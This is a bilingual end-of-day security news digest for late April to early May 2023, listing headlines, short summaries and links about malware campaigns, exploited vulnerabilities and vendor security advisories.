End-of-Day report
Timeframe: Freitag 28-04-2023 18:00 - Dienstag 02-05-2023 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
News
Hackers target vulnerable Veeam backup servers exposed online
Veeam backup servers are being targeted by at least one group of threat actors known to work with multiple high-profile ransomware gangs.
https://www.bleepingcomputer.com/news/security/hackers-target-vulnerable-veeam-backup-servers-exposed-online/
New LOBSHOT malware gives hackers hidden VNC access to Windows devices
A new malware known as LOBSHOT distributed using Google ads allows threat actors to stealthily take over infected Windows devices using hVNC.
https://www.bleepingcomputer.com/news/security/new-lobshot-malware-gives-hackers-hidden-vnc-access-to-windows-devices/
Researchers Uncover New BGP Flaws in Popular Internet Routing Protocol Software
Cybersecurity researchers have uncovered weaknesses in a software implementation of the Border Gateway Protocol (BGP) that could be weaponized to achieve a denial-of-service (DoS) condition on vulnerable BGP peers.
https://thehackernews.com/2023/05/researchers-uncover-new-bgp-flaws-in.html
trawler: Dredging Windows for Persistence
Trawler is a PowerShell script designed to help Incident Responders discover potential indicators of compromise on Windows hosts, primarily focused on persistence mechanisms including Scheduled Tasks, Services, Registry Modifications, Startup Items, Binary Modifications and more.
https://github.com/joeavanzato/Trawler
Angriffe auf Lücken in TP-Link Archer, Apache Log4j2 und Oracle Weblogic
Angreifer nutzen Sicherheitslücken in TP-Link Archer, Apache Log4j2 und Oracle Weblogic aus, um Zugriff auf Netzwerke von Opfern zu erlangen.
https://heise.de/-8984237
Medizin-Geräte: Warnung vor kritischer Sicherheitslücke in Illumina-Software
Die US-IT-Sicherheitsbehörde CISA warnt vor kritischen Sicherheitslücken in den medizinischen Geräten von Illumina. Angreifer könnten die Kontrolle übernehmen.
https://heise.de/-8983960
Exploitation of 5-Year-Old TBK DVR Vulnerability Spikes
Fortinet warns of a massive spike in malicious attacks targeting a five-year-old authentication bypass vulnerability in TBK DVR devices.
https://www.securityweek.com/exploitation-of-5-year-old-tbk-dvr-vulnerability-spikes/
Critical Infrastructure Organizations Urged to Identify Risky Communications Equipment
CISA urges organizations to review FCC-s Covered List of risky communications equipment and incorporate it in their supply chain risk management efforts.
https://www.securityweek.com/critical-infrastructure-organizations-urged-to-identify-risky-communications-equipment/
Webinar: Recherchetools im Internet richtig nutzen
Wie kann ich Google, aber auch andere Suchmaschinen richtig nutzen? Welche Recherchetools und Suchmethoden gibt es noch? In diesem Webinar zeigen wir Ihnen, wie eine gute und effiziente Onlinerecherche aussehen kann. Nehmen Sie kostenlos teil: Dienstag 09. Mai 2023, 18:30 - 20:00 Uhr via zoom.
https://www.watchlist-internet.at/news/webinar-recherchetools-im-internet-richtig-nutzen/
Online-Shopping: Bezahlen Sie nicht mit der PayPal-Funktion -Geld an einen Freund senden-
Neuerdings missbrauchen Fake-Shops die PayPal-Funktion -Geld an Freunde und Familie senden-. Die Kriminellen hinter den Fake-Shops erstellen PayPal.Me-Zahlungslinks. Durch kleine Anpassungen der Kriminellen ist der Kaufbetrag dort hinterlegt und die Zahlungsart -Geld an einen Freund senden- voreingestellt. Wenn Sie mit dieser Zahlungsart bezahlen, entfällt der Käuferschutz. Ihr Geld ist dann weg und kann nicht zurückgeholt werden.
https://www.watchlist-internet.at/news/online-shopping-bezahlen-sie-nicht-mit-der-paypal-funktion-geld-an-einen-freund-senden/
Apple veröffentlicht -schnelle Sicherheitsmaßnahme- für iOS, iPadOS und macOS
Die neue Updatemethode verkürzt den Installationsvorgang deutlich. Apple will mit schnellen Sicherheitsmaßnahmen künftig beispielsweise Bedrohungen wie Zero-Day-Lücken schneller beseitigen.
https://www.zdnet.de/88408872/apple-veroeffentlicht-schnelle-sicherheitsmassnahme-fuer-ios-ipados-und-macos/
Enforce Zero Trust in Microsoft 365 - Part 1: Setting the basics
This first blog post is part of a series of blog posts related to the implementation of Zero Trust approach in Microsoft 365. This series will first cover the basics and then deep dive into the different features such as Azure Active Directory (Azure AD) Conditional Access policies, Microsoft Defender for Cloud Apps policies, Information Protection and Microsoft Endpoint Manager, to only cite a few.
https://blog.nviso.eu/2023/05/02/enforce-zero-trust-in-microsoft-365-part-1-setting-the-basics/
CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers
AhnLab Security Emergency response Center (ASEC) has recently discovered XMRig CoinMiner being installed on poorly managed Linux SSH servers.
https://asec.ahnlab.com/en/51908/
A LNK Between Browsers: Hunting Methodologies and Extension Abusing Actors
Two pillars in sleight of hand magic are User Initiated Action, where the target needs to believe their actions are their own, and Hidden Action, the trick needs to be concealed behind something ordinary and nonthreatening. Mandiant became aware of a chain of adversary methodologies that leverage these two pillars to achieve persistence.
https://www.mandiant.com/resources/blog/lnk-between-browsers
Vulnerabilities
Wireshark 4.0.5 Released, (Sat, Apr 29th)
Wireshark version 4.0.5 was released with 11 bugs and 3 vulnerabilities fixed.
https://isc.sans.edu/diary/rss/29790
Azure DevOps CICD Pipelines - Command Injection with Parameters, Variables and a discussion on Runner hijacking
This article discusses a vulnerability with Azure DevOps that can be exploited by users able to run pipelines with user-controlled variables. The vulnerability allows malicious users with access to edit runtime parameter values to inject shell commands that execute on the pipeline runner. This can compromise the runner and allow access to sensitive information such as secrets used for deployments and Azure service principal credentials.
https://pulsesecurity.co.nz/advisories/Azure-Devops-Command-Injection
Security updates for Monday
Security updates have been issued by Debian (distro-info-data, ffmpeg, jackson-databind, jruby, libapache2-mod-auth-openidc, libxml2, openvswitch, sniproxy, and wireshark), Fedora (git, libsignal-protocol-c, php-nyholm-psr7, python-setuptools, rust-askama, rust-askama_shared, rust-comrak, thunderbird, and webkitgtk), SUSE (git, glib2, shadow, thunderbird, and webkit2gtk3), and Ubuntu (Apache Commons Net, git, linux-azure-5.15, linux-azure-fde, linux-kvm, linux-ibm-5.4, linux-snapdragon, netty, and ZenLib).
https://lwn.net/Articles/930588/
Security updates for Tuesday
Security updates have been issued by Debian (libdatetime-timezone-perl and tzdata), Fedora (chromium), Red Hat (emacs and libwebp), Slackware (netatalk), and Ubuntu (php7.0).
https://lwn.net/Articles/930649/
IBM Security Bulletins 2023-04-28 - 2023-05-02
IBM Engineering Test Management, IBM Spectrum Scale, IBM DataPower Gateway, IBM i, Rational ClearQuest, IBM Business Automation Workflow, IBM Business Automation Workflow Enterprise Service Bus, IBM Case Manager, BladeCenter, PureFlex System and Flex System, System x, IBM Maximo, IBM Control Desk, Db2 for Linux, UNIX and Windows, IBM Robotic Process Automation, Tivoli Business Service Manager, Content Manager Client, IBM Sterling Secure Proxy, IBM App Connect Enterprise, IBM Security Key Lifecycle Manager, IBM MQ, IBM MQ Appliance, Tivoli Application Dependency Discovery Manager, IBM Cloud Pak, IBM InfoSphere Information, WebSphere Remote Server, IBM Workload Scheduler.
ZDI-23-503: (Pwn2Own) NETGEAR RAX30 logCtrl Command Injection Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-23-503/
ZDI-23-502: (Pwn2Own) NETGEAR RAX30 SOAP Request SQL Injection Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-23-502/
ZDI-23-501: (Pwn2Own) NETGEAR RAX30 Device Configuration Cleartext Storage Information Disclosure Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-23-501/
ZDI-23-496: NETGEAR RAX30 lighttpd Misconfiguration Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-23-496/
ZDI-23-495: NETGEAR RAX30 rex_cgi JSON Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-23-495/
Android-Sicherheitsbulletin - Mai 2023
https://source.android.com/docs/security/bulletin/2023-05-01?hl=de
F5: K000133706 : OpenSSL vulnerability CVE-2023-0464
https://my.f5.com/manage/s/article/K000133706
F5: K000133615 : device-mapper-multipath vulnerability CVE-2022-41974
https://my.f5.com/manage/s/article/K000133615
F5: K000133753 : PHP vulnerability CVE-2023-0662
https://my.f5.com/manage/s/article/K000133753
Securing Databricks cluster init scripts
https://sec-consult.com/blog/detail/securing-databricks-cluster-init-scripts/
Vulnerabilities in the Autodesk® 3ds Max® USD plugin
https://www.autodesk.com/trust/security-advisories/adsk-sa-2023-0008
Mitsubishi Electric Factory Automation Products
https://www.cisa.gov/news-events/ics-advisories/icsa-23-122-01
Zyxel security advisory for post-authentication command injection vulnerability in NBG6604 home router
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-command-injection-vulnerability-in-nbg6604-home-router
Zyxel security advisory for multiple vulnerabilities in NBG-418N v2 home router
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-in-nbg-418n-v2-home-router